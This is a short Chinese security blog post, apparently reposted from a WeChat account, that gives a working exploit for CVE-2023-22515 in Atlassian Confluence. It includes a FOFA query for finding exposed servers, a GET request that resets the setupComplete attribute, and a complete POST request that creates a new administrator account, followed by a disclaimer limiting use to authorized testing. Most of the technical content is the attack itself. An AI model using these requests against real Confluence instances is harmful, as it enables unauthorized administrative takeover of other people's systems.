Atlassian Confluence是企业广泛使用的wiki系统。
2023年10月4日,Atlassian官方发布了对于CVE-2023-22515漏洞的补丁。这个漏洞是由属性覆盖导致,利用该漏洞攻击者可以重新执行Confluence安装流程并增加管理员账户。
影响版本:version>8.0.0
指纹:
fofa:app="Atlassian-Confluence"
覆盖Confluence中的bootstrapStatusProvider.applicationConfig.setupComplete属性:
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
然后新建管理员账户
POST /setup/setupadministrator.action HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeX-Atlassian-Token: no-checkContent-Length: 122Content-Type: application/x-www-form-urlencodedusername=newadmin1&fullName=newadmin1&email=1234567123@qq.com&password=newPassword1&confirm=newPassword1&setup-next-button=Next
这一步对应的新建账户页面
成功添加:
登录:
小知识
声明
本文提供的技术参数仅供学习或运维人员对内部系统进行测试提供参考,未经授权请勿用本文提供的技术进行破坏性测试,利用此文提供的信息造成的直接或间接损失,由使用者承担。
好文推荐
原文始发于微信公众号(丁永博的成长日记):Confluence未授权管理用户添加-CVE-2023-22515
特别标注:
本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
- 我的微信
- 微信扫一扫
-
- 我的微信公众号
- 微信扫一扫
-
评论